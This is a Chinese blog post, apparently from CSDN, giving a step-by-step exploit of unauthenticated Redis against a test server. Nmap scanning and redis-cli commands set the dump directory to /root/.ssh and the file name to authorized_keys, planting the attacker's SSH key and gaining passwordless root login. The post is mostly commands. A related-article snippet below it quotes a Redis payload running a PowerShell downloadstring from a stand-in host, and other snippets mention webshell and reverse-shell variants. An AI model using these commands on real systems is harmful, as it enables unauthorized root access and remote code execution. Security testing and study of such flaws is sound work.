redis未授权访问漏洞利用

最新推荐文章于 2024-05-29 13:35:26 发布
最新推荐文章于 2024-05-29 13:35:26 发布
阅读量327 收藏 1
点赞数
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011790603/article/details/96479257
版权

参考:https://blog.csdn.net/guxiaoguo/article/details/78913245

利用条件:linux,对方开启ssh

用到的工具:kail nmap redis

公司测试服务器:10.0.3.45

redis默认端口:6379

主要思路:利用redis未授权访问命令给root账户写入SSH公钥文件,然后通过SSH登录服务器

nmap扫描

使用命令:nmap -sV -p 1-65535 10.0.3.45

-sV 识别服务,很有用

-p 1-65535 全端口扫描

发现6379端口开启

若kail上没有redis,可以先利用wget下载下来,并解压,我这里用的是2.8.12

下载命令:wget http://download.redis.io/releases/redis-2.8.12.tar.gz

解压命令:tar -xzf redis-2.8.12.tar.gz

到所在目录中安装:make

完成安装后会提醒:

换到此目录中:cd /root/redis-2.8.12/src

连接

命令:./redis-cli -h 10.0.3.45

可以通过info查看一些信息。

接下来写入ssh公钥

原理就是在数据库中插入一条数据,将本机的公钥作为value,key值随意,然后通过修改数据库的默认路径为/root/.ssh和默认的缓冲文件authorized.keys,把缓冲的数据保存在文件里,这样就可以再服务器端的/root/.ssh下生一个授权的key。

首先在自己的kail中生成一个key。

进入/root/.ssh目录:cd /root/.ssh

生成key命令:ssh-keygen -t rsa

查看生成的文件

将公钥导入key.txt文件中(前后用\n换行,目的是避免和redis里的其他数据混合,造成乱码),再把key.txt文件内容写入目标主机的缓冲里:

命令:(echo -e “\n\n”; cat id_rsa.pub; echo -e “\n\n”) > key.txt

此时切换回redis的目录,将key.txt文件内容写入到目标主机的缓冲中

cd /root/redis-2.8.12/src

cat /root/.ssh/key.txt | ./redis-cli -h 10.0.3.45 -x set xxx

连接目标主机的redis,设置redis的备份路径为/root/.ssh和保存文件名authorized_keys

连接目标主机命令:./redis-cli -h 10.0.3.45

设置备份路径:config set dir /root/.ssh

保存文件名:config set dbfilename authorized_keys

可以看到写入的公钥

get xxx

然后将数据保存在服务器硬盘中并退出

save

exit

此时用ssh远程连接:

命令:ssh 10.0.3.45

可以看到已经不用密码就可以远程登录了(在没有经过这些操作前,进入ssh是需要输入password的)

可以进入/root/.ssh目录,简单看一下authorized_keys的文件内容

洪小帮主
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ssrf+redis授权靶场
actistsec的博客
10-25 1887
自己搭建不太合理的ssrf联动redis授权
Redis授权访问漏洞的重现与利用
qq_40882763的博客
03-24 1903
Redis 默认情况下,会绑定在 0.0.0.0:6379,,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。
Redis授权四种利用方式与修复方案
qq_45234543的博客
11-08 5121
想整理一波Redis利用方式,在内网中很容易遇见(方便运维人员) 简介:redis是一个key-value存储系统,nosql - 非关系型数据库,支持存储的value类型相对更多,包括string、list、set、zset和hash。这些数据类型都支持push/pop、add/remove及交并差和更丰富的操作,且操作都是原子性。为了保证效率,数据都是缓存在内存中,区别是redis会周期性的把更新的数据写入磁盘或者把修改写入追加的记录文件,并在这个基础上实现了master-slave(主从)同步
windows环境redis授权利用手法总结
最新发布
2401_84466336的博客
05-29 1280
redis 目标ip:6379>set x "/r/n/r/npowershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://csip:80/a'))\"/r/n/r/n。也就是说在`c:/windows/system32/wbem/mof/`目录下的mof文件会每5秒自动执行一次,这样就不需要重启机器就能获取权限了。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
Redis授权访问漏洞利用详解
LUOBIKUN的博客
10-19 1905
redis授权访问漏洞详解简介:复现环境搭建安装redis修改配置文件利用利用姿势1,redis写入ssh公钥,获取操作系统权限利用姿势2,直接向Web目录中写webshell利用姿势3,linux计划任务执行命令反弹shell:原理:cron介绍示例:修复建议 简介: Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis
Redis授权访问漏洞详解(全面)
m0_64481831的博客
02-26 3062
Redis是一款内存高速缓存的数据库,是一款K-V型数据库,它的所有键值都是用字典来存储的。其中它的value支持多种数据类型,包括String、List、Set、Zset和Hash。Redis默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问,就会将Redis服务暴露在公网上;并且Redis默认情况是空密码连接在服务器以root身份运行Redis时这将导致任意用户可以访问目标服务器下授权访问Redis以及读取Redis数据。
redis授权getshell四种方式
BING
04-24 4239
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。在两个Redis实例设置主从模式的时候,Redis的主机实例可以通过FULLRESYNC同步文件到从机上,然后在从机上加载so文件,我们就可以执行拓展的新命令了。
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
Redis授权访问配合SSH key文件利用详解
09-09
本文将详细讨论一个常见的安全问题:Redis授权访问配合SSH key文件利用。 Redis默认监听在`0.0.0.0:6379`,这意味着它对所有网络接口开放,如果不加以限制,任何能够访问到服务器的人都可以尝试连接Redis。特别是...
E044-服务漏洞利用及加固-利用redis授权访问漏洞进行提权.pdf
12-02
本文主要涉及的是网络安全领域中的一个常见问题,即如何利用Redis授权访问漏洞进行提权。Redis是一款开源的、高性能的键值数据库,常用于数据缓存和快速数据处理。当Redis配置不当,允许授权的外部访问时,攻击...
Redis授权漏洞利用
tangshuangsss的专栏
01-04 623
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,...
redis漏洞复现】Redis getshell的几种方式
一剑开天门!的博客
03-01 1万+
Redis getshell的几种方式
Redis数据库授权访问漏洞的三种利用方式
zh的博客
10-22 3577
漏洞描述: 由于Redis默认是运行在TCP的6379端口上,而且默认安装没有设置用户访问认证,也没有访问IP限制,这样导致端口开放后,对Redis服务可以直接匿名访问,并且可对数据库进行匿名操作,信息泄露,执行命令等操作。 一、Redis数据库安装 虚拟机CentOS7,Xshell连接,拷贝安装包,解压 cd 看看有什么 src 源码所在的文件夹 安装编译工具:make 和 gcc 记得选Y 安装完成 进入src目录,执行命令:make 编译完...
Redis授权访问漏洞利用总结
热门推荐
Fly_鹏程万里
07-06 2万+
0x01 redis介绍Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。Redis因配置不当可以授权访问。攻击者无需认证访问到内部数据,可导致敏感信息泄露,也可以恶意执行flusha...
Redis授权访问漏洞复现的(三种方式)
永不垂头的博客
12-30 3537
Redis授权访问漏洞复现(三种方式) 一、Redis介绍 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。 二、漏洞简介及危害 漏洞简介 Redis因配置不当就会导致授权访问。在默认情况下,Redis会绑定在 0.0.0.0:6379。如果没有采用相关的策略,比如添加防火墙规则避免其他非信
Redis 授权访问 写入webshell记录
qq_38053759的博客
04-08 857
Redis 授权访问 写入webshell记录 准备环境: win10(192.168.39.52): 小皮面板(redis) kali(192.168.39.191):redis 1.Redis安装 win10:安装小皮面板,利用小皮面板安装redis。软件管理》工具,点击安装即可。 点击redis设置,系统默认绑定IP为:127.0.0.1,改为0.0.0.0(默认绑定本地的话远程无法访问redis,故设置为0.0.0.0,即所有IP均可访问) 配置完成到首页启动redis即可.
redis授权访问的利用方式
Redredredfish的博客
08-23 1508
redis授权访问的利用方式 漏洞原理: Redis<3.2默认情况下,会绑定在0.0.0.0:6379,如果没有进行采用相关的安全策略,比如添加防火墙黑白名单等等,这样会将Redis服务暴露在公网上。 如果在没有设置密码(默认为空)的情况下,会导致任意用户可以授权访问Redis以及读取Redis的数据。攻击者利用Redis自身的提供的config命令,可以进行写文件操作,还可以将ssh公钥写入目标服务器./root/.ssh下的authotrized_keys 文件中,进而可以利用对应私钥直接使
Redis主从复制getshell技巧
06-10 2万+
Redis授权漏洞常见的漏洞利用方式: Windows下,绝对路径写webshell 、写入启动项。 Linux下,绝对路径写webshell 、公私钥认证获取root权限 、利用contrab计划任务反弹shell。 基于Redis主从复制的机制,可以通过FULLRESYNC将任意文件同步到从节点(slave),这就使得它可以轻易实现以上任何一种漏洞利用方式,而且存在着...
redis授权访问漏洞
weixin_42140534的博客
01-18 932
0X01 漏洞介绍 redis 默认情况下,会绑定再 0.0.0.0:6379, 如果没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源的ip访问,这样会将redis的服务暴漏在公网上,如果在没有设置密码认证的情况下,会导致任意用户可以访问目标服务器的情况下授权访问redis以及读取redis数据。攻击者在授权访问redis的情况下,利用redis自身提供的config命令,可以进行写文件的操作,攻击者可以成功将自己的ssh公钥写入目标服务器的/root/.ssh文件夹的authotrized_

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值